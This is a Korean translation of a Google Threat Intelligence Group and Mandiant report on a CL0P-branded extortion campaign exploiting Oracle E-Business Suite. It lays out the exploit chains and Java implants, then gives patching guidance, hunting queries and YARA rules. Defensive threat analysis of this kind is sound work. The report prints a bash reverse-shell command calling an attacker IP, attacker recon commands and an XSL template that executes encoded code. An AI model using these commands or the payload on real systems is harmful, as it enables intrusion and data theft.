당신의 시스템도 안전한가? 오라클 E-Business Suite 제로데이 악용한 광범위 위협 실태
Mandiant
Google Threat Intelligence Group
해당 블로그의 원문은 2025년 10월 10일 Google Cloud 블로그(영문)에 게재되었습니다.
작성자: Peter Ukhanov, Genevieve Stark, Zander Work, Ashley Pearson, Josh Murchie, Austin Larsen
서론
2025년 9월 29일부터 Google 위협 인텔리전스 그룹(GTIG)과 Mandiant는 CL0P 갈취(Extortion) 조직과 연관되었다고 주장하는 위협 행위자가 주도하는 새로운 대규모 갈취 캠페인을 추적하기 시작했습니다. 이 행위자는 수많은 조직의 임원들에게 대량의 이메일을 보내, 피해자의 Oracle E-Business Suite(EBS) 환경에서 민감한 데이터를 절취했다고 주장했습니다. 2025년 10월 2일, Oracle은 위협 행위자들이 2025년 7월에 패치되었던 취약점들을 악용했을 수 있다고 보고했으며, 고객들에게 최신 중요 패치 업데이트를 적용할 것을 권장했습니다. 2025년 10월 4일, Oracle은 고객들에게 이 취약점에 대응하기 위해 긴급 패치를 적용하도록 지시하며, 모든 중요 패치 업데이트(Critical Patch Updates)를 최신 상태로 유지해야 한다는 기존의 권장 사항을 재차 강조했습니다.
당사의 분석에 따르면, CL0P 갈취 캠페인은 EBS 고객 환경을 표적으로 삼은 수개월간의 침입 활동에 이은 것입니다. 위협 행위자는 패치가 나오기 몇 주 전인 2025년 8월 9일경부터 Oracle EBS 고객들을 상대로 제로데이(zero-day) 취약점인 CVE-2025-61882로 추정되는 취약점을 악용했으며, 추가적인 의심 활동은 2025년 7월 10일로 거슬러 올라갑니다. 일부 사례에서는 이 위협 행위자가 피해 조직으로부터 상당한 양의 데이터를 성공적으로 외부로 유출했습니다.
이 게시물은 해당 캠페인에 대한 심층 분석을 제공하고, 위협 행위자들이 Oracle EBS를 침해하기 위해 사용한 다단계 Java 임플란트 프레임워크를 해체하여 분석하며, 초기 악용 활동에 대해 상세히 설명하고, 방어자들을 위한 실행 가능한 지침과 침해 지표(IOCs, indicators of compromise)를 제공합니다.
배경
CL0P (일명 CL0P^_- LEAKS) 데이터 유출 사이트(DLS, data leak site)는 2020년에 설립되었습니다. 초기에는 GTIG가 FIN11로 귀속되는 CL0P 랜섬웨어를 포함하는 다각적인 갈취 운영에 DLS가 사용되는 것을 관찰했습니다. 최근에는, 주장되는 피해자들의 대다수가 Accellion 레거시 파일 전송 어플라이언스(FTA), GoAnywhere MFT, MOVEit MFT 및 Cleo LexiCom을 포함한 관리형 파일 전송(MFT) 시스템의 제로데이 취약점 대량 악용에서 비롯된 데이터 절취 갈취 사건과 관련이 있는 것으로 보입니다. 이 사건들의 대부분에서 위협 행위자들은 제로데이(0-day) 취약점을 대량으로 악용하여 피해자 데이터를 훔친 다음, 몇 주 후에 갈취 시도를 시작했습니다. 이러한 데이터 절취 갈취 활동은 가장 빈번하게 FIN11 및 FIN11로 의심되는 위협 클러스터에 귀속되었지만, 당사는 CL0P 랜섬웨어와 CL0P DLS가 서로 다른 전술, 기술 및 절차(TTPs)를 사용하는 최소한 한 명의 위협 행위자에 의해 사용된다는 증거 또한 관찰했습니다. 이는 FIN11이 시간이 지남에 따라 멤버십 또는 파트너십을 확장했을 수 있음을 시사할 수 있습니다.
Oracle EBS를 표적으로 삼은 이 최신 캠페인은 이 성공적이고 영향력이 큰 운영 모델의 지속을 보여줍니다.
그림 1: 10월 8일 업데이트된 CL0P DLS 사이트
위협 세부 정보
CL0P 갈취 캠페인
2025년 9월 29일부터 위협 행위자는 수백 개, 어쩌면 수천 개에 달하는 침해된 제3자 계정을 통해 대량의 이메일 캠페인을 시작했습니다. 이 계정들은 서로 관련 없는 다양한 조직에 속해 있으며, 그 로그인 자격 증명은 아마도 언더그라운드 포럼에서 판매되는 정보 절취 악성코드(infostealer malware) 로그에서 확보되었을 것입니다. 이는 위협 행위자들이 합법성을 높이고 스팸 필터를 우회하기 위해 사용하는 흔한 전술입니다. 회사 임원들에게 전송된 이 이메일들은 해당 행위자가 그들의 Oracle EBS 애플리케이션을 침해하고 문서들을 외부로 유출했다고 주장했습니다.
주목할 만한 점은, 이 이메일들에 support@pubstorm.com과 support@pubstorm.net이라는 두 개의 연락처 주소가 포함되어 있다는 것인데, 이 주소들은 적어도 2025년 5월부터 CL0P DLS(데이터 유출 사이트)에 등록되어 있었습니다. 자신들의 주장을 입증하기 위해, 위협 행위자는 2025년 8월 중순으로 거슬러 올라가는 데이터를 포함하여 피해 조직의 EBS 환경에서 가져온 실제 파일 목록을 여러 조직에 제공했습니다. 갈취 이메일은 주장된 피해자들이 금전 지불을 대가로 도난당한 데이터의 공개를 막을 수 있다고 밝혔지만, 금액과 지불 방식은 명시되지 않았습니다. 이는 대부분의 최신 갈취 운영에서 전형적인 방식으로, 피해자가 위협 행위자에게 연락하여 협상 권한이 있음을 표시한 후에야 몸값이 제시되는 것이 일반적입니다.
현재까지 GTIG는 이 캠페인의 피해자가 CL0P DLS에 게시된 것을 관찰하지 못했습니다. 이는 행위자들이 피해자 데이터를 게시하기까지 일반적으로 몇 주를 기다렸던 CL0P 브랜드와 관련된 과거 캠페인의 행보와 일치합니다.
그림 2: 피해자 임원들에게 발송된 공갈 이메일
기술적 분석: 익스플로잇 해부
최근 공갈 캠페인 이전에 Oracle E-Business Suite (EBS) 서버를 표적으로 한 익스플로잇 활동이 식별되었으며, 이는 2025년 7월로 거슬러 올라갈 가능성이 높습니다.
Oracle released a patch on Oct. 4 for CVE-2025-61882, which referenced a leaked exploit chain targeting the UiServlet component, but Mandiant has observed multiple different exploit chains involving Oracle EBS and it is likely that a different chain was the basis for the Oct. 2 advisory that originally suggested a known vulnerability was being exploited. It's currently unclear which specific vulnerabilities/exploit chains correspond to CVE-2025-61882, however, GTIG assesses that Oracle EBS servers updated through the patch released on Oct. 4 are likely no longer vulnerable to known exploitation chains.
2025년 7월 활동: 'UiServlet' 관련 의심스러운 활동
Mandiant 사고 대응팀은 2025년 7월에 Oracle EBS 서버를 표적으로 하는 활동을 식별했으며, 애플리케이션 로그는 /OA_HTML/configurator/UiServlet을 표적으로 하는 익스플로잇을 시사했습니다. Mandiant 조사에서 복구된 아티팩트는 2025년 10월 3일 "SCATTERED LAPSUS$ HUNTERS"라는 Telegram 그룹에서 유출된 익스플로잇과 일부 중복되지만, GTIG는 2025년 7월에 관찰된 활동을 이 익스플로잇 사용과 직접적으로 연관시킬 충분한 증거가 부족합니다. 현재 GTIG는 UNC6240 (일명 "Shiny Hunters")과 관련된 행위자들이 이 익스플로잇 활동에 연루되었다고 평가하지 않습니다.
- watchTowr Labs에 의해 분석된 유출된 익스플로잇은 서버 측 요청 위조(SSRF), 캐리지 리턴 라인 피드(CRLF) 주입, 인증 우회, 및 XSL 템플릿 주입을 포함한 여러 고유한 기본 요소를 결합하여 대상 Oracle EBS 서버에서 원격 코드 실행을 획득합니다. 언급했듯이, 이 체인에서 익스플로잇된 취약점 중 어느 것이 특정 CVE에 해당하는지는 명확하지 않습니다. 익스플로잇 후 실행되는 모든 명령은 Linux에서는
sh를, Windows에서는cmd.exe를 사용합니다. -
유출된 익스플로잇 아카이브에는 Bash 리버스 셸 실행에 대한 사용법을 보여주는 샘플 호출이 포함되어 있었으며,
bash -i >& /dev/tcp/<ip>/<port> 0>&1과 같은 구조의 명령이었습니다.
2025년 7월 패치 릴리스 이전에 관찰된 활동
7월 20일, 2025년 7월 Oracle EBS 보안 업데이트 릴리스 이전에, Mandiant는 200.107.207.26에서 오는 의심스러운 HTTP 트래픽을 식별했습니다. GTIG는 이 활동의 정확한 성격을 확인할 수 없었지만, 이것이 Oracle EBS 서버에 대한 초기 익스플로잇 시도였을 가능성이 있습니다. 그러나 유출된 익스플로잇에서 수행된 원격 XSL 페이로드 검색과 일치하는 아웃바운드 HTTP 트래픽을 보여주는 포렌식 증거는 없었으며, 의심스러운 명령이 실행된 것도 관찰되지 않아, 이것이 실제 익스플로잇 시도였는지 여부를 평가하는 데 어려움이 있었습니다.
또한, 인터넷 스캔 데이터는 상기 활동과 거의 동시에 Python AIOHTTP 서버를 노출하는 서버를 보여주었으며, 이는 공개적으로 유출된 익스플로잇의 콜백 서버 사용과 일치합니다.
2025년 7월 패치 릴리스 이후 관찰된 활동
패치가 릴리스된 후, Mandiant는 161.97.99.49에서 Oracle EBS 서버를 대상으로 하는 익스플로잇 시도로 보이는 활동을 관찰했으며, /OA_HTML/configurator/UiServlet에 대한 HTTP 요청이 기록되었습니다. 특히, EBS 관련 다양한 로그는 이러한 요청 중 일부가 시간 초과되었음을 나타내는데, 이는 유출된 공개 익스플로잇에 존재하는 SSRF 취약점이나, 요청을 깔끔하게 종료했을 후속 활동이 실패했을 수 있음을 시사합니다. 이러한 오류는 2025년 7월 패치 릴리스 이전에 기록된 활동에서는 관찰되지 않았습니다.
GTIG는 현재 이 두 활동 세트가 동일한 위협 행위자에 의해 수행되었는지 여부를 확인할 수 없습니다.
2025년 8월 활동: 'SyncServlet'을 표적으로 하는 익스플로잇 체인
2025년 8월, 한 위협 행위자는 SyncServlet 구성 요소의 취약점을 익스플로잇하기 시작했으며, 이는 인증되지 않은 원격 코드 실행을 허용했습니다. 이 활동은 상기 활동에서 관찰된 200.107.207.26을 포함하여 여러 위협 행위자 서버에서 시작되었습니다.
- 익스플로잇 흐름: 공격은
/OA_HTML/SyncServlet에 대한 POST 요청으로 시작됩니다. 그런 다음 행위자는 XDO 템플릿 관리자 기능을 사용하여 EBS 데이터베이스 내에 새롭고 악성인 템플릿을 생성합니다. 익스플로잇의 최종 단계는 템플릿 미리보기 기능을 통해 페이로드를 트리거하는 요청입니다. 다음 엔드포인트에 대한 요청은 높은 신뢰도의 침해 지표입니다.
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TMP|DEF><16_RANDOM_HEX_STRING>&TemplateType=<XSL-TEXT|XML>…악성 페이로드는 XDO_TEMPLATES_B 데이터베이스 테이블에 새 템플릿으로 저장됩니다. 템플릿 이름(TemplateCode)은 일관되게 접두사 TMP 또는 DEF로 시작하며, TemplateType은 각각 XSL-TEXT 또는 XML로 설정됩니다. 다음은 데이터베이스에 저장된 페이로드의 예시이며, Base64 페이로드는 생략되었습니다.
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
<xsl:template match="/">
<xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'<BASE64STRING>')"/>
<xsl:variable name="js" select="str:new($bs)"/>
<xsl:variable name="m" select="jsm:new()"/>
<xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
<xsl:variable name="code" select="eng:eval($e, $js)"/>
<xsl:value-of select="$code"/>
</xsl:template>
</xsl:stylesheet>주목할 점은 이 XSL 페이로드의 구조가 이전에 논의된 유출된 Oracle EBS 익스플로잇의 XSL 페이로드와 동일하다는 것입니다.
GTIG는 XSL 페이로드에 포함된 Java 페이로드의 최소 두 가지 다른 체인을 식별했으며, 그 중 일부는 여기서도 논의되었습니다.
- GOLDVEIN.JAVA - 다운로더: GOLDVEIN의 Java 변종으로, 공격자가 제어하는 명령 및 제어(C2 또는 C&C) IP 주소로 요청을 보내 2단계 페이로드를 검색하고 실행하는 다운로더입니다. 이 비콘은 "TLSv3.1" 핸드셰이크로 위장하며, 실행 결과를 HTML 주석 내의 HTTP 응답으로 행위자에게 반환하는 로깅 기능을 포함합니다. Mandiant는 현재 GOLDVEIN.JAVA에 의해 다운로드된 후속 페이로드를 복구하지 못했습니다.
- GOLDVEIN은 원래 PowerShell로 작성되었으며, 추적명 UNC5936인 FIN11 위협 클러스터로 의심되는 행위자가 2024년 12월에 여러 Cleo 소프트웨어 제품 익스플로잇 캠페인에서 처음 관찰했습니다.
- SAGE* 감염 체인:
/help/state/content/destination./navId.1/navvSetId.iHelp/를 포함하는 엔드포인트에 대한 요청을 모니터링하여 추가 Java 페이로드를 배포하는 지속성 필터를 초래하는 중첩된 여러 Java 페이로드의 체인입니다.- XSL 페이로드는 Base64로 인코딩된 SAGEGIFT 페이로드를 포함합니다. SAGEGIFT는 Oracle WebLogic 서버용으로 작성된 맞춤형 Java 리플렉티브 클래스 로더입니다.
- SAGEGIFT는 SAGELEAF를 로드하는 데 사용되는데, SAGELEAF는 Oracle WebLogic 서블릿 필터를 리플렉티브하게 로드하기 위한 공개 코드를 기반으로 하며 추가 로깅 코드가 포함된 메모리 내 드로퍼입니다. SAGELEAF의 로그는 이를 로드한 부모 SAGEGIFT 페이로드에 의해 검색되며, HTML 주석 내의 HTTP 응답(GOLDVEIN.JAVA와 동일한 구조)으로 행위자에게 반환될 수 있습니다.
- SAGELEAF는 악성 Java 서블릿 필터인 SAGEWAVE를 설치하는 데 사용되며, 이를 통해 행위자는 Java 클래스가 포함된 AES 암호화된 ZIP 아카이브를 배포할 수 있습니다. 당사의 분석에 따르면, SAGEWAVE의 메인 페이로드는 GOLDTOMB의
Cli모듈과 유사할 수 있습니다. 다만, 현재까지 이 최종 단계를 직접 관찰하지는 못했습니다. - Mandiant는 요청 페이로드를 처리하기 위해 HTTP 헤더
X-ORACLE-DMS-ECID가 특정 하드코딩된 값으로 설정되어야 하는 SAGEWAVE 변종을 관찰했으며,/support/state/content/destination./navId.1/navvSetId.iHelp/를 포함하여 요청 필터링에 사용되는 다른 HTTP 경로도 확인했습니다.
그림 3: SAGE 감염 체인/트리거 다이어그램
성공적인 익스플로잇 이후, 위협 행위자는 EBS 계정 "applmgr"에서 정찰 명령을 실행하는 것이 관찰되었습니다. 이러한 명령에는 다음이 포함됩니다.
cat /etc/fstab
cat /etc/hosts
df -h
ip addr
cat /proc/net/arp
/bin/bash -i >& /dev/tcp/200.107.207.26/53 0>&1
arp -a
ifconfig
netstat -an
ping 8.8.8.8 -c 2
ps -aux게다가 Mandiant는 위협 행위자가 Java에서(GOLDVEIN.JAVA 2단계 페이로드를 실행하는 EBS 프로세스) bash -i를 사용하여 추가 bash 프로세스를 실행한 다음, 새로 시작된 bash 프로세스에서 다양한 명령을 실행하는 것을 관찰했습니다. EBS 계정 "applmgr"로 실행되는 Java에 의해 시작된 모든 bash -i 프로세스의 자식 프로세스는 위협 행위자의 명령을 탐지하기 위한 조사 과정의 일부로 검토되어야 합니다.
귀속: 확인되거나 의심되는 FIN11 활동과의 중첩
GTIG는 현재 이 활동을 추적되는 특정 위협 그룹에 공식적으로 귀속시키지 않았습니다. 그러나 적어도 2025년 5월부터 CL0P DLS(데이터 유출 사이트)에 등록되어 온 연락처 주소(support@pubstorm.com 및 support@pubstorm.net)를 포함하여 CL0P 공갈 브랜드를 사용했다는 점은 주목할 만합니다. GTIG는 초기에 CL0P 랜섬웨어와 관련된 다면적인 공갈 작전에 사용된 DLS를 관찰했으며 이를 FIN11에 귀속시켰습니다. 더 최근에는, 피해자로 추정되는 대다수가 FIN11 및 의심되는 FIN11 위협 클러스터에 자주 귀속되는 관리형 파일 전송(MFT) 시스템 익스플로잇에서 비롯된 데이터 절취 공갈 사건과 관련이 있는 것으로 보입니다. 하지만, CL0P 랜섬웨어와 CL0P DLS가 FIN11에 의해서만 독점적으로 사용되지 않았다는 증거도 관찰되어, 이 요소만으로는 귀속을 단정할 수 없습니다.
CL0P과의 중첩 외에도, 침해 후 도구는 이전에 의심되는 FIN11 캠페인에서 사용된 악성코드와 논리적으로 유사함을 보입니다. 구체적으로, 2단계 페이로드를 가져오는 메모리 내 Java 기반 로더 GOLDVEIN.JAVA의 사용은 2024년 말 Cleo MFT 취약점 대량 익스플로잇 기간 동안 의심되는 FIN11 클러스터 UNC5936에 의해 배포된 GOLDVEIN 다운로더 및 GOLDTOMB 백도어를 연상시킵니다. 또한, 최근 공갈 이메일을 보내는 데 사용된 침해 계정 중 하나는 이전에 FIN11이 사용했던 계정입니다. 현재 진행 중인 분석을 통해 이 최근 활동과 FIN11 및 UNC5936와 같은 다른 위협 클러스터 간의 관계에 대한 더 많은 세부 정보가 밝혀질 수 있습니다.
시사점
광범위하게 사용되는 엔터프라이즈 애플리케이션의 제로데이 취약점을 익스플로잇한 후 몇 주 뒤 대규모의 브랜드화된 공갈 캠페인을 진행하는 패턴은 역사적으로 FIN11에 귀속된 활동의 특징이며, 다른 위협 행위자들에게도 매력적일 수 있는 전략적 이점을 가지고 있습니다. 민감한 데이터를 저장하는 대외적으로 노출된 애플리케이션 및 어플라이언스를 표적으로 삼는 것은 위협 행위자들이 측면 이동에 시간과 자원을 할애할 필요가 없다는 점을 감안할 때, 데이터 절취 작업의 효율성을 높일 가능성이 높습니다. 위협 행위자들이 제로데이 취약점을 활용하고, 네트워크 발자국을 제한하며, 공갈 통지를 지연시키는 이 전반적인 접근 방식은 방어자들에게 그들의 존재를 알리지 않고 수많은 조직에서 데이터를 유출할 수 있다는 점에서 전반적인 영향력을 거의 확실하게 증가시킵니다. CL0P 관련 행위자들은 적어도 2020년 말부터 이 접근 방식을 사용해 왔다는 점에서 이러한 대규모 익스플로잇 캠페인이 성공적이라고 인식하고 있을 가능성이 높습니다. 따라서 우리는 그들이 적어도 가까운 미래까지 유사한 애플리케이션에 대한 제로데이 익스플로잇 확보에 자원을 계속 투입할 것으로 예상합니다.
권장 사항
GTIG와 Mandiant는 이 활동으로 인한 위협을 완화하고 탐지하며 Oracle E-Business Suite 환경을 강화하기 위해 다음 조치를 권장합니다.
-
비상 패치를 즉시 적용: 설명된 익스플로잇 활동(CVE-2025-61882)을 완화하는 2025년 10월 4일에 릴리스된 Oracle EBS 패치 적용을 우선시해야 합니다. 현재 활발하게 진행 중인 현장 익스플로잇을 고려할 때, 이는 초기 접근을 방지하는 가장 중요한 단계입니다.
-
데이터베이스에서 악성 템플릿 탐색: 위협 행위자는 페이로드를 EBS 데이터베이스에 직접 저장합니다. 관리자는 악성 템플릿을 식별하기 위해
XDO_TEMPLATES_B및XDO_LOBS테이블을 즉시 쿼리해야 합니다.TEMPLATE_CODE가TMP또는DEF로 시작하는 모든 템플릿을 검토하십시오. 페이로드는LOB_CODE열에 저장됩니다.
SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;-
아웃바운드 인터넷 액세스 제한: 관찰된 Java 페이로드는 2단계 임플란트(implant)를 가져오거나 데이터를 유출하기 위해 C2 서버로의 아웃바운드 연결이 필요합니다. EBS 서버에서 인터넷으로 나가는 모든 필수적이지 않은 트래픽을 차단하십시오. 이는 서버가 침해된 경우에도 공격 체인을 방해할 수 있는 보완 통제(compensating control)입니다.
-
네트워크 로그 모니터링 및 분석: 침해 지표(IOC)를 모니터링하십시오.
TMP또는DEF접두사로 시작하는 TemplateCode를 포함하는 TemplatePreviewPG 엔드포인트에 대한 요청은 익스플로잇 시도의 강력한 지표입니다. 또한,/OA_HTML/configurator/UiServlet및/OA_HTML/SyncServlet에 대한 비정상적인 요청을 조사하십시오. -
메모리 포렌식 활용: 이 캠페인에 사용된 임플란트는 주로 Java 기반이며 메모리에서 실행됩니다. 침해가 의심되는 경우, EBS 애플리케이션과 관련된 Java 프로세스에 대한 메모리 분석을 통해 디스크에는 없는 악성 코드나 아티팩트가 발견될 수 있습니다.
감사의 말씀
이 분석은 Google Threat Intelligence Group 및 Mandiant Consulting의 전반적인 도움 없이는 불가능했을 것입니다. 또한 FLARE의 Genwei Jiang와 Elliot Chernofsky에게 특별히 감사드립니다.
침해 지표 (Indicators of Compromise)
다음 침해 지표는 등록된 사용자를 위해 Google Threat Intelligence (GTI) 컬렉션에서 제공됩니다.
YARA 룰
rule G_Downloader_GOLDVEIN_JAVA_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$chunk1 = "175,121,73" base64
$chunk2 = "249,254,255" base64
$chunk3 = "235,176,29" base64
$chunk4 = "242,61,32" base64
$chunk5 = "189,66,134" base64
$str1 = "java.net.Socket(h,443)" base64
$str2 = "TLSv3.1" base64
$decoded1 = "[175,121,73,249,254,255,235,176,29,242,61,32,189,66,134,102,56,208,18,10,132,242,223,202,90,97,118,3,83,136,84,213]"
$decoded2 = "java.net.Socket(h,443)"
$decoded3 = "TLSv3.1"
condition:
(3 of ($chunk*) and all of ($str*)) or all of ($decoded*)
}rule G_Dropper_SAGEGIFT_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$str1 = "ServletRequestImpl" base64
$str2 = "getServletRequest" base64
$str3 = "ServletResponseImpl" base64
$str4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])" base64
$decoded1 = "ServletRequestImpl"
$decoded2 = "getServletRequest"
$decoded3 = "ServletResponseImpl"
$decoded4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])"
condition:
all of ($str*) or all of ($decoded*)
}rule G_Dropper_SAGELEAF_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$log1 = "n1=%d n2=%d"
$log2 = "ctx.l=%d"
$log3 = "Filter=" fullword
$pat = "/help/*"
$s1 = "weblogic.t3.srvr.ServerRuntime"
$s2 = "gzipDecompress"
$s3 = "BASE64Decoder"
$s4 = "getDeclaredMethod"
condition:
2 of ($log*) and 5 of them
}rule G_Launcher_SAGEWAVE_1 {
meta:
author = "Google Threat Intelligence Group (GTIG)"
strings:
$s1 = "Log4jConfigQpgsubFilter"
$s2 = ".Cli" fullword
$s3 = "httpReq" fullword
$s4 = "AES/CBC/NoPadding"
$s5 = "javax/servlet/FilterChain"
$s6 = "java/lang/reflect/Method"
condition:
4 of ($s*) and filesize < 1MB
}